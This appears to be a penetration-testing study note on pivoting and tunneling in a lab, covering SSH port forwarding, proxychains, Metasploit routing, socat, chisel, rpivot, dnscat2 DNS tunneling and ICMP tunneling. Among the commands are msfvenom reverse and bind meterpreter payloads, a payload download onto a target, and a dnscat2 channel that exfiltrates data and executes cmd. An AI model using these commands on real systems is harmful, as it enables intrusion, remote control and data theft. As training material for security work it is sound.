We will often find ourselves in situations where we have compromised credentials to move onto another hosts, but no other host is reachable from our attack host. We will need a pviot host that we already compromised to find a way to our next target.

Pivoting’s primary use to defeat segmentation to access an isolated network.

Lateral Movement is a technique to further our access to additional hosts, applications, and services.

Tunneling involves using various protocols to shuffle traffic in/out of a network where the is a chance of our traffic being detected.

Networking Behind Pivoting

Every computer on a network has an IP address. The IP address is assigned in software usually by a DHCP server. Sometimes we may have static IP assignments.

The IP address is assigned to a Network Interface Controller (NIC). A computer may have multiple NICs meaning it can have multiple IP addresses.

# check additional NICs linux
ifconfig
# windows
ipconfig

There are IPv6 addresses and IPv4. Every IPv4 address will have a corresponding subnet mask that defines the netowkr and host portion of an IP address. When network traffic is destined for an IP address located in a different network the computer will send the traffic to its assigned default gateway. This is usually the router.

We will often have to make a pivot host traffic to another network. A router has a routing table that it uses to forward traffic based on the destination IP address. OSes will often have that information as well.

netstat -r

Protocols govern network communications. Many services have corresponding ports that act as identifiers. When we see an open port bound to an IP address, we know that it identifies an application we may able to connect to.

A SOCKS proxy is a protocol that helps communicate with servers where you have firewall restrictions in place. Traffic is generated by a SOCKS client, which connects to the SOCKS server controlled by the user who wants to access a service on the client-side.

Port Forwarding

Port Forwarding allows us to redirect communication request from one port to another. Uses TCP as communication layer. Application layer protocols like SSH or even SOCKS can be used to encapsulate the forwarded traffic.

If a service is not accessible from the outside, we can port forward through an accessible service like SSH to access it from our local host.

# port forward through SSH to access closed port 3306 on the target box
ssh -L 1234:localhost:3306 ubuntu@10.129.202.64
 
# confirm the port forward
netstat -antp | grep 1234
 
# forwarding with multiple ports
ssh -L 1234:localhost:3306 -L 8080:localhost:80 ubuntu@10.129.202.64

Creating a Pivot

We want to know which services lie on the side of a protected network. So, we can scan the entire subnet. We cannot do this directly from our attack host because the it does not have routes to the network. Thus, we will perform dynamic port forwarding and pivot our network packets. We can do this by starting a SOKCS listener on our local hosts and then configure SSH to forward that traffic via SSH. This is called SSH tunneling over SOCKS (Socket Secure) proxy.

SOCKS proxies can pivot via creating a route to an external server from NAT networks. Come in two types

  • SOCKS4 with no authentication and UDP support
  • SOCKS5 does.
# enable dynamic port forwarding with SSH on attack host
ssh -D 9050 ubuntu@10.129.202.64

We still require a tool that can route any tool’s packets over the port 9050. proxychains can redirect TCP connections through TOR, SOCKS, HTTPS, etc. We must modify the configuration file to tell it to use port 9050.

tail -4 /etc/proxychains.conf

From here, all tools are possible with prefix proxychains.

Reverse Port Forwarding

We might want to forward a local service to the remote port. We find a pivot host, which is a common connection between our attack host and target host. We will configure say a, reverse shell, to connect to the pivot host on a specific port (8080) but forward all of our reverse packets to our attack hosts’ 8000 port, where our shell listener exists.

# transferring payload to pivot host
scp backupscript.exe ubuntu@<ipAddressofTarget>:~/
 
# start webserver on pivot host
python3 -m http.server 8123
 
# download payload on the target
 Invoke-WebRequest -Uri "http://172.16.5.129:8123/backupscript.exe" -OutFile "C:\backupscript.exe"
 
# Asks the pivot host to listen and forward all incoming connection to port 8080 to 8000
ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN
 

Meterpreter Tunneling

If we have meterpreter shell access on the Ubuntu server, and want to perform enumeration scans through the pivot host with meterpreter, we can create a pivot with our meterpreter session without SSH port forwarding.

# payload for pivot host
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.18 -f elf -o backupjob LPORT=8080
 
# listener
use exploit/multi/handler

Instead of using SSH for port forwarding, we can also use Metasploit’s routing module to configure a local proxy on our attack host.

# configure MSF socks proxyu
msf6 > use auxiliary/server/socks_proxy
msf6 > set SRVPORT 9050
msf6 > set SRVHOST 0.0.0.0
msf6 > run
 
# make sure to configure proxychains
 
# tell our socks_proxy module to route all traffic via our meterpreter session
msf6 > use post/multi/manage/autoroute
msf6 post(multi/manage/autoroute) > set SESSION 1
msf6 post(multi/manage/autoroute) > set SUBNET 172.16.5.0
msf6 post(multi/manage/autoroute) > run
# add routes directly in meterpreter.
meterpreter > run autoroute -s 172.16.5.0/23
 
# port forwarding
meterpreter > help portfwd
 
# start a listener on our attack host's local port and forward all packet to the remote server
meterpreter > portfwd add -l 3300 -p 3389 -r 172.16.5.19

We can also create reverse port forwards

# forwarding rules - forwards all connections on port 1234 of pivot to local port 8081
meterpreter > portfwd add -R -l 8081 -p 1234 -L 10.10.14.18

Socat Redirection

Socat is bidirectional relay tool that can create pipe sockets between 2 independent network channels without needing to use SSH tunneling. It can listen on one host and port forward that data to another IP address and port.

Reverse Shell:

# start a listener on port 8080 and forward to 80
socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80 

For a bind shell, a listener will be executed on the target host and bind to a particular port. Socat will listen for incoming connections from a Metasploit bind handler and forward that to a bind shell payload on a Windows target.

# bind shell creation
msfvenom -p windows/x64/meterpreter/bind_tcp -f exe -o backupjob.exe LPORT=8443
 
# start socat bind shell listener
socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443 

SSH for Windows

Plink is a windows command-line SSH tool that comes part of PuTTY. Plink can allow us to use to create dynamic port forwards and SOCKS proxies.

# start an SSH session between the Windows attack host and the pivot host
plink -ssh -D 9050 ubuntu@10.129.15.50

To start a SOCKS tunnel via the SSH session we created we can use the Windows tool called Proxifier.

Sshuttle

Another tool written in Python removes the need to configure proxychains. Only works pivoting over SSH. This does not use proxychains and rather adds entries to our iptables and adding pivot rules for the remote host.

# connect to the remote machine with a username and password
sudo sshuttle -r ubuntu@10.129.202.64 172.16.5.0/23 -v

Browser SOCKS Troubleshooting (ssh -D vs sshuttle)

ssh -D builds a SOCKS proxy, so every app must speak SOCKS correctly and handle DNS. Browsers often fail here: they fire background requests and push hostnames through the tunnel, which get resolved on the pivot side. If the pivot cannot resolve those names, the SSH logs show:

channel 3: open failed: connect failed: Temporary failure in name resolution

curl against the raw IP works because it makes one direct request with no extra lookups. Firefox is noisier and tends to leave stuck channels in the ssh -D process.

The fix is sshuttle, which behaves like a lightweight VPN over SSH: it transparently captures TCP traffic to the chosen subnet, so no per-app proxy config or DNS quirks apply.

# failing: SOCKS proxy, browsers break on DNS resolution at the pivot
ssh -D 8081 -i dmz01_key root@10.129.60.108
 
# works: sshuttle transparently routes the subnet through the SSH pivot
sudo sshuttle -r root@10.129.60.108 \
  -e "ssh -i /home/kali/dmz01_key" \
  172.16.8.0/24
 
# then browse the target directly, no proxy settings needed
# http://172.16.8.20/

sshuttle mainly handles TCP. ICMP (ping) will not traverse it, UDP is limited/optional, and only the subnet(s) you pass on the command line get tunneled.

Rpivot

A reverse SOCKS proxy tool that binds a machine inside a corporate network to an external server and exposes the client’s local port on the server-side.

# SOCKS proxy server to connect to to our client on the compromised pivot host
python2 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0
 
# transfer rpivot to pivot host
scp -r rpivot ubuntu@<IpaddressOfTarget>:/home/ubuntu/
 
# running client.py from pivot
python2 client.py --server-ip 10.10.14.18 --server-port 9999
 
# browsing the target webserver
proxychains firefox-esr 172.16.5.135:80

Windows Netsh

Netsh is CLI tool that helps with network configuration of a particular Windows system. It can help port-forward.

# forward all data received on port 8080 to a remote port
netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.25
 
# verify port forward
netsh.exe interface portproxy show v4tov4

DNS Tunneling

Dnscat2 is a tunneling that uses DNS protocol to send data between two hosts. It uses an encrypted C2 channel inside TXT records within the DNS protocol. When a hostname is request from an external server, the data is exfiltrated and sent over the network instead of a legitimate DNS request.

# start the dnscat2 server
sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache
 
# cloning dnscat2-powershell to the attack host
git clone https://github.com/lukebaggett/dnscat2-powershell.git
 
# import the module
Import-Module .\dnscat2.ps1
 
# establish the tunnnel with key
Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd
 
# connect to session
dnscat2> window -i 1

Chisel

TCP/UDP-based tunneling tool written in Go that uses HTTP to transport data that is secured using SSH.

# transport chisel binary to pivot host
scp chisel ubuntu@10.129.202.64:~/
 
# running chisel server on the pivot host
## listen for incoming connections and forward iut to all the networks accessible from the pivot host
./chisel server -v -p 1234 --socks5
 
# connecting to the chisel server
./chisel client -v 10.129.202.64:1234 socks
 
# modify proxychains
tail -f /etc/proxychains.conf

A reverse pivot, the server will listen and accept connections, and they will be proxied through the client, which specified the remote.

# start the server on attack host
sudo ./chisel server --reverse -v -p 1234 --socks5
 
# connecting the client to attack host
/chisel client -v 10.10.14.17:1234 R:socks
 
# confirm proxy chains
tail -f /etc/proxychains.conf

ICMP Tunneling

ICMP tunneling encapsulates your traffic within ICMP packets containing echo requests and responses. ICMP tunneling only works when ping responses are permitted within a firewalled network.

ptunnel-ng to create a tunnel between the pivot host and our attack host.

# build ptunnel 
sudo ./autogen.sh
 
# transferring ptunnel to pivot host
scp -r ptunnel-ng ubuntu@10.129.202.64:~/
 
# starting the ptunnel server on the pivot host
sudo ./ptunnel-ng -r10.129.202.64 -R22
 
# connecting to the server from attack host
sudo ./ptunnel-ng -p10.129.202.64 -l2222 -r10.129.202.64 -R22
 
# connect to the target using SSH
ssh -p2222 -lubuntu 127.0.0.1
 
# dynamic port forwarding over ssh to use proxychains
## creates the SOCKS proxy that proxychains4 expected to find on 127.0.0.1:1080
ssh -D 9050 -p2222 -lubuntu 127.0.0.1

RDP and SOCKS tunnelling

If we cannot use SSH for pivoting. We could use tools available for Windows OS systems. SocksOverRDP is a tool that uses Dynamic Virtual Channels (DVC) from the Remote Desktop feature of Windows. DVC is responsible for tunneling packets over the RDP connection (like clipboard or audio transfer), but we can also tunnel arbitrary packets over the network.

We need

  • SocksOverRDP binaries
  • Proxifier Portable Binary
# Loading socksoverRDP.dll
regsvr32.exe SocksOverRDP-Plugin.dll
 
# 2. connect to target host over RDP using mstsc.exe